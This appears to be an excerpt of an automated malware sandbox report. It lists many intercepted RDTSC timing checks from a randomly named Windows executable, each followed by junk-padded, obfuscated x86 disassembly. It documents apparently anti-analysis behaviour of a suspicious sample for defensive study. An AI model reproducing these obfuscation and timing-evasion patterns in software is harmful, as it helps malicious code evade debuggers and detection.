Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F600CA second address: 6F600FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDC00CE27B7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F600FB second address: 6F60113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC0050BD54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60113 second address: 6F60172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e jmp 00007FDC00CE27B6h 0x00000013 xchg eax, ebx 0x00000014 jmp 00007FDC00CE27B0h 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c mov cx, dx 0x0000001f jmp 00007FDC00CE27B3h 0x00000024 popad 0x00000025 movzx eax, dx 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60172 second address: 6F60178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60178 second address: 6F6017D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F6017D second address: 6F601B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, dword ptr [eax+10h] 0x0000000d jmp 00007FDC0050BD57h 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDC0050BD55h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F601B9 second address: 6F601BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F601BF second address: 6F601C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F601C3 second address: 6F60211 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FDC00CE27B9h 0x00000011 xchg eax, esi 0x00000012 jmp 00007FDC00CE27AEh 0x00000017 mov esi, dword ptr [775606ECh] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60211 second address: 6F60215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60215 second address: 6F6021B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F6021B second address: 6F60221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60221 second address: 6F60225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60225 second address: 6F60229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60229 second address: 6F6028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FDC00CE27AAh 0x0000000f jne 00007FDC00CE35FAh 0x00000015 pushad 0x00000016 mov di, si 0x00000019 pushfd 0x0000001a jmp 00007FDC00CE27AAh 0x0000001f and ecx, 09DE7F28h 0x00000025 jmp 00007FDC00CE27ABh 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, edi 0x0000002d jmp 00007FDC00CE27B6h 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FDC00CE27AEh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F6028D second address: 6F602C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov di, si 0x0000000e mov dl, ah 0x00000010 popad 0x00000011 call dword ptr [77530B60h] 0x00000017 mov eax, 756AE5E0h 0x0000001c ret 0x0000001d jmp 00007FDC0050BD53h 0x00000022 push 00000044h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov eax, ebx 0x00000029 mov bl, D0h 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F6038C second address: 6F60392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60416 second address: 6F6041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F6041C second address: 6F60434 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60434 second address: 6F60438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60438 second address: 6F6043C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F6043C second address: 6F60442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60442 second address: 6F60518 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDC00CE27B2h 0x00000009 sbb eax, 0F63D068h 0x0000000f jmp 00007FDC00CE27ABh 0x00000014 popfd 0x00000015 jmp 00007FDC00CE27B8h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test esi, esi 0x0000001f pushad 0x00000020 mov al, A0h 0x00000022 pushfd 0x00000023 jmp 00007FDC00CE27B3h 0x00000028 jmp 00007FDC00CE27B3h 0x0000002d popfd 0x0000002e popad 0x0000002f je 00007FDC7126199Bh 0x00000035 pushad 0x00000036 mov ecx, 5CB3593Bh 0x0000003b mov si, 4E17h 0x0000003f popad 0x00000040 sub eax, eax 0x00000042 pushad 0x00000043 mov edx, 6FCBFD9Ch 0x00000048 movsx edx, si 0x0000004b popad 0x0000004c mov dword ptr [esi], edi 0x0000004e pushad 0x0000004f mov ch, 17h 0x00000051 pushfd 0x00000052 jmp 00007FDC00CE27AFh 0x00000057 add eax, 0586ABCEh 0x0000005d jmp 00007FDC00CE27B9h 0x00000062 popfd 0x00000063 popad 0x00000064 mov dword ptr [esi+04h], eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FDC00CE27ADh 0x0000006e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60518 second address: 6F60587 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c jmp 00007FDC0050BD4Eh 0x00000011 mov dword ptr [esi+0Ch], eax 0x00000014 jmp 00007FDC0050BD50h 0x00000019 mov eax, dword ptr [ebx+4Ch] 0x0000001c pushad 0x0000001d mov ax, 776Dh 0x00000021 movzx ecx, dx 0x00000024 popad 0x00000025 mov dword ptr [esi+10h], eax 0x00000028 jmp 00007FDC0050BD55h 0x0000002d mov eax, dword ptr [ebx+50h] 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FDC0050BD4Dh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60587 second address: 6F60597 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60597 second address: 6F605D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b jmp 00007FDC0050BD57h 0x00000010 mov eax, dword ptr [ebx+54h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDC0050BD55h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F605D3 second address: 6F605D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F605D9 second address: 6F60649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+18h], eax 0x0000000e pushad 0x0000000f call 00007FDC0050BD54h 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 mov eax, edx 0x00000019 popad 0x0000001a mov eax, dword ptr [ebx+58h] 0x0000001d pushad 0x0000001e movsx edx, si 0x00000021 pushfd 0x00000022 jmp 00007FDC0050BD52h 0x00000027 jmp 00007FDC0050BD55h 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esi+1Ch], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60649 second address: 6F60651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, si 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60651 second address: 6F60657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60657 second address: 6F60677 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop edi 0x00000010 call 00007FDC00CE27AEh 0x00000015 pop ecx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60677 second address: 6F6067D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F6067D second address: 6F60681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60681 second address: 6F60685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60685 second address: 6F606CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+20h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FDC00CE27B4h 0x00000012 sub si, CF38h 0x00000017 jmp 00007FDC00CE27ABh 0x0000001c popfd 0x0000001d mov ch, 91h 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+60h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FDC00CE27ADh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F606CE second address: 6F606E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F606E3 second address: 6F60710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c pushad 0x0000000d mov ecx, 3BFA0ED3h 0x00000012 mov ecx, 624CC52Fh 0x00000017 popad 0x00000018 mov eax, dword ptr [ebx+64h] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e movzx eax, dx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60710 second address: 6F6077A instructions: 0x00000000 rdtsc 0x00000002 mov dh, DFh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDC0050BD54h 0x0000000b popad 0x0000000c mov dword ptr [esi+28h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 mov ax, 6EA3h 0x00000015 pushfd 0x00000016 jmp 00007FDC0050BD58h 0x0000001b and ecx, 3682DFE8h 0x00000021 jmp 00007FDC0050BD4Bh 0x00000026 popfd 0x00000027 popad 0x00000028 call 00007FDC0050BD58h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60901 second address: 6F60907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60907 second address: 6F6090B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F6090B second address: 6F6092F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ecx, edx 0x00000013 push ebx 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F6092F second address: 6F609A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+20h] 0x0000000e pushad 0x0000000f call 00007FDC0050BD4Ch 0x00000014 pop eax 0x00000015 mov dl, 55h 0x00000017 popad 0x00000018 mov dword ptr [esi+40h], eax 0x0000001b jmp 00007FDC0050BD56h 0x00000020 lea eax, dword ptr [ebx+00000080h] 0x00000026 jmp 00007FDC0050BD50h 0x0000002b push 00000001h 0x0000002d jmp 00007FDC0050BD50h 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FDC0050BD57h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F609A9 second address: 6F609AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F609AF second address: 6F609B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F609B3 second address: 6F609E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx edx, ax 0x00000010 push esi 0x00000011 movsx edx, ax 0x00000014 pop ecx 0x00000015 popad 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDC00CE27B2h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F609E4 second address: 6F609EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F609EA second address: 6F609EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F609EE second address: 6F60A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e pushad 0x0000000f mov ecx, 386BA043h 0x00000014 mov ax, FD9Fh 0x00000018 popad 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60A16 second address: 6F60A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60A1A second address: 6F60A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60A20 second address: 6F60A78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 pushfd 0x00000007 jmp 00007FDC00CE27B0h 0x0000000c sbb cl, 00000038h 0x0000000f jmp 00007FDC00CE27ABh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a mov dl, 10h 0x0000001c pushfd 0x0000001d jmp 00007FDC00CE27B0h 0x00000022 or eax, 1BB70298h 0x00000028 jmp 00007FDC00CE27ABh 0x0000002d popfd 0x0000002e popad 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60A78 second address: 6F60A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60A7C second address: 6F60A82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60A82 second address: 6F60A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60A88 second address: 6F60A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60AD4 second address: 6F60B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov cx, CEF7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d js 00007FDC70A8A928h 0x00000013 pushad 0x00000014 mov dx, si 0x00000017 mov ecx, 447DB20Bh 0x0000001c popad 0x0000001d mov eax, dword ptr [ebp-0Ch] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDC0050BD4Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60B03 second address: 6F60B72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c pushad 0x0000000d mov cl, D3h 0x0000000f call 00007FDC00CE27B9h 0x00000014 movzx esi, di 0x00000017 pop edi 0x00000018 popad 0x00000019 lea eax, dword ptr [ebx+78h] 0x0000001c jmp 00007FDC00CE27B8h 0x00000021 push 00000001h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FDC00CE27B7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60B72 second address: 6F60BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FDC0050BD4Ch 0x00000011 sbb eax, 134F94C8h 0x00000017 jmp 00007FDC0050BD4Bh 0x0000001c popfd 0x0000001d mov edx, esi 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60BBA second address: 6F60BC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60BC8 second address: 6F60BDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov bx, ax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60BDE second address: 6F60C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDC00CE27AAh 0x0000000a or eax, 008B4988h 0x00000010 jmp 00007FDC00CE27ABh 0x00000015 popfd 0x00000016 popad 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a pushad 0x0000001b mov di, si 0x0000001e jmp 00007FDC00CE27B0h 0x00000023 popad 0x00000024 nop 0x00000025 pushad 0x00000026 push esi 0x00000027 pop esi 0x00000028 pushfd 0x00000029 jmp 00007FDC00CE27B9h 0x0000002e or esi, 43C27206h 0x00000034 jmp 00007FDC00CE27B1h 0x00000039 popfd 0x0000003a popad 0x0000003b push eax 0x0000003c jmp 00007FDC00CE27B1h 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FDC00CE27ADh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60C71 second address: 6F60C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60CA9 second address: 6F60CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov edi, eax 0x0000000c jmp 00007FDC00CE27B7h 0x00000011 test edi, edi 0x00000013 pushad 0x00000014 mov cx, B06Bh 0x00000018 mov dx, si 0x0000001b popad 0x0000001c js 00007FDC71261188h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60CE2 second address: 6F60CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60CEA second address: 6F60D49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FDC00CE27ADh 0x00000015 sub esi, 6DB59F96h 0x0000001b jmp 00007FDC00CE27B1h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FDC00CE27B0h 0x00000027 sbb ah, FFFFFFB8h 0x0000002a jmp 00007FDC00CE27ABh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60D49 second address: 6F60D60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 69h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, 7B700DF5h 0x00000013 mov di, si 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60D60 second address: 6F60DC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007FDC00CE27B6h 0x00000011 push 00000001h 0x00000013 jmp 00007FDC00CE27B0h 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDC00CE27B7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exe RDTSC instruction interceptor: First address: 6F60DC0 second address: 6F60E1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDC0050BD4Fh 0x00000009 jmp 00007FDC0050BD53h 0x0000000e popfd 0x0000000f push esi 0x00000010 pop edx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 jmp 00007FDC0050BD55h 0x0000001a nop 0x0000001b jmp 00007FDC0050BD4Eh 0x00000020 lea eax, dword ptr [ebp-18h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
